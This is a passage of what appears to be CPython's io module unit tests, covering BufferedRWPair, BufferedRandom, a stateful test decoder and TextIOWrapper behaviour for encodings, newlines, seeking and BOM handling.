self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
